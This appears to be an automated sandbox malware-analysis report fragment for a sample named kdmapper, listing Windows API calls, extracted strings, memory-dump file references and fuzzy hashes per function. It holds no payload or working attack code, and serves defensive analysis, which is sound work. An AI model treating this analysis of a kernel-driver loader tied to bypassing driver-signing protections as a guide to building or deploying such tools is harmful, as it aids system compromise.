                                                                                                                                                                                                                • Part of subcall function 00DEB146: GetVersionExW.KERNEL32(?), ref: 00DEB16B
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00DF1251
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00DF1263
                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DF1274
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1284
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1294
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00DF12CF
                                                                                                                                                                                                              • __aullrem.LIBCMT ref: 00DF1379
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1247370737-0
                                                                                                                                                                                                              • Opcode ID: dbdea8c2392905e3056da34f28e7d2d8d1a8c50581a0708acbaa71499005d8f0
                                                                                                                                                                                                              • Instruction ID: f3e5eee454d78a4296b83ec91f2011e0e5c77a49832d24c92a111b76992aa323
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbdea8c2392905e3056da34f28e7d2d8d1a8c50581a0708acbaa71499005d8f0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A14108B5508345AFC710DF65C8849ABBBF9FF88314F04892EF696D2210E734E649CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DE2536
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                                • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                              • API String ID: 3053425827-2277559157
                                                                                                                                                                                                              • Opcode ID: 9aea46286de729e5a73882b4960e3ae8ea18b1c61e9e1c75329bc89364975269
                                                                                                                                                                                                              • Instruction ID: ae7b058cefe3ae519730a6ca3afcf6de1697cf1416ce857fe3dc53d9ac661dca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aea46286de729e5a73882b4960e3ae8ea18b1c61e9e1c75329bc89364975269
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F104716043C09BDB25FB2A88D5BFA77D9AB94300F0C456DED8A9B283CB648945C772
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                                              • API String ID: 176396367-3568243669
                                                                                                                                                                                                              • Opcode ID: cbd5fdb18fecc64b20bb74d659809a1a4439be947ee61b05c5ea4b1417761006
                                                                                                                                                                                                              • Instruction ID: 964c75f78bf4e8ff619c8560fa5a2e3e00cf229cd50ea9c804e17a4437bd4544
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd5fdb18fecc64b20bb74d659809a1a4439be947ee61b05c5ea4b1417761006
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4151D566E4132A95DB309A259C31776F3E4DFA1750F6EC42AFBC19B2C0FB658C818271
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E0FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00E0F6CF
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00E0F74A
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00E0F765
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E0F78B
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00E0FE02,00000000,?,?,?,?,?,?,?,?,?,00E0FE02,00000000), ref: 00E0F7AA
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00E0FE02,00000000,?,?,?,?,?,?,?,?,?,00E0FE02,00000000), ref: 00E0F7E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                              • Opcode ID: 5c00b5383f4ad8e93bb5494b77810e12df88a4630b04da5deb9655c8ef156aba
                                                                                                                                                                                                              • Instruction ID: 17295275bd3b5f66c6cd8d382ed400bd661c5dda94f7d6864d606d030c12b7a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c00b5383f4ad8e93bb5494b77810e12df88a4630b04da5deb9655c8ef156aba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2751C8B1E002099FCB24CFA4DC45AEEBBF4EF09300F14916AE555F7291D770AA95CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00DFCE9D
                                                                                                                                                                                                                • Part of subcall function 00DEB690: _wcslen.LIBCMT ref: 00DEB696
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFCED1
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,00E2946A), ref: 00DFCEF1
                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00DFCF22
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00DFCFFE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                                                                                                              • String ID: %s%s%u
                                                                                                                                                                                                              • API String ID: 689974011-1360425832
                                                                                                                                                                                                              • Opcode ID: f756a05d5749a0bc1d1e1a6c48634719245055ac9e4bb496709f94a292203382
                                                                                                                                                                                                              • Instruction ID: a3981e7f37d99b381d11e1031e39fba3daae08580ab71986bc526b902fee96d9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f756a05d5749a0bc1d1e1a6c48634719245055ac9e4bb496709f94a292203382
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F84181B190025DAADF21AB61DC45AFA77FDEF05300F45C0A6FB09E7041EA719A858F71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E02937
                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E0293F
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E029C8
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E029F3
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E02A48
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                              • Opcode ID: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                                                                                                                                                              • Instruction ID: f7e1a960f837755cfcb0f6258cc74b065782aea1981d7907611550ba4bf8d7c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1041D434A00208AFCF14DF68C889ADEBBF5AF84328F149159E9157B3D2D7319A85CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00DF9EEE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00DF9F44
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00DF9FDB
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00DF9FE3
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00DF9FF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$RectText
                                                                                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                                                                                              • API String ID: 3937224194-1658105358
                                                                                                                                                                                                              • Opcode ID: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                                                                                                                                                              • Instruction ID: 95836e03847abb1ced75751c69a5ef756c4a3c8135dad1405ba5436215ac3191
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1410271405314AFCB215F75EC48F2BBBA8FF48301F098558FA4AA9156CB30E94ACB71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                              • API String ID: 176396367-3743748572
                                                                                                                                                                                                              • Opcode ID: 9f7236f5074be272b90599fd6254192b076f47a7f60c59a527e0fed1c736a16d
                                                                                                                                                                                                              • Instruction ID: 7564487e82f5bd1a5ee976a5118c0f433fd1b534e5bff1fb2a4af18ebfac960a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f7236f5074be272b90599fd6254192b076f47a7f60c59a527e0fed1c736a16d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA319072E4434956D630AB549C12B76F3E4EB90320F55C41FF682572C0FBA1ADD183B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00E0C868: _free.LIBCMT ref: 00E0C891
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C8F2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C8FD
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C908
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C95C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C967
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C972
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0C97D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                              • Instruction ID: 8e10f35ed3343a3394b9c16a458f6938fdc32005fe27ed166d80cbc177edf3cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0114F71590B06AAE520B7B1DC07FCB7BEC9F00B00F509E15F2DD760D2DA65B5858760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DFE669,00DFE5CC,00DFE86D), ref: 00DFE605
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DFE61B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DFE630
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                              • API String ID: 667068680-1718035505
                                                                                                                                                                                                              • Opcode ID: 35eaee0459f3b1bebd9a1715549e5c7aa00cd3e31ca03da2d0f65e6e692326fc
                                                                                                                                                                                                              • Instruction ID: 0c37569d433841e624f4fc67ae6e3258def2f91cf2a3dcf4ea4a53919c8d3d5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35eaee0459f3b1bebd9a1715549e5c7aa00cd3e31ca03da2d0f65e6e692326fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF0AF3278032E9F0F214E765C845B663CA6B2974130A887ADA06F7120EB14C8995BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0891E
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
                                                                                                                                                                                                                • Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08930
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08943
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08954
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08965
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                                              • API String ID: 776569668-2678736219
                                                                                                                                                                                                              • Opcode ID: 31ef9170c8d7029358f2928425bc459d78559086599d45e45111322104d200e8
                                                                                                                                                                                                              • Instruction ID: 2bbf2e70f1f2c8942662c547af32cbd523ee83b95c67cf210964116fac4962a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31ef9170c8d7029358f2928425bc459d78559086599d45e45111322104d200e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF03A798201238FC6066F16FE024453FE5F726714381274AFA59723F1CB71498A9B85
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF14C2
                                                                                                                                                                                                                • Part of subcall function 00DEB146: GetVersionExW.KERNEL32(?), ref: 00DEB16B
                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DF14E6
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF1500
                                                                                                                                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DF1513
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1523
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1533
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                              • Opcode ID: c34ec35143e85b9877919d2e87fe64cc716862ac879ac50ed88e00876b671f3f
